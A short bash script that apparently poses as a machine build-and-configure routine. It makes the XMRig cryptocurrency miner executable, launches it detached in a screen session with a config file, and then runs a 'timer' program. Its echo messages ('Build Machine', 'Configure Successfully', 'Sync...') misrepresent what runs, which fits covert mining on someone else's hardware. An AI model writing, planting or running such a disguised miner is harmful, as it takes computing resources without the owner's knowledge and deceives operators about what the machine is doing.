#!/bin/bash

echo "+++++++ Build Machine +++++++++"
nohup mkdir safa

echo "+++++++ Configure Machine +++++++++"
chmod +x xmrig
cd safa

echo "Configure Successfully"
cd ..
screen -d -m ./xmrig --config=config.json
echo "+++++++ Sync... +++++++++"
./timer
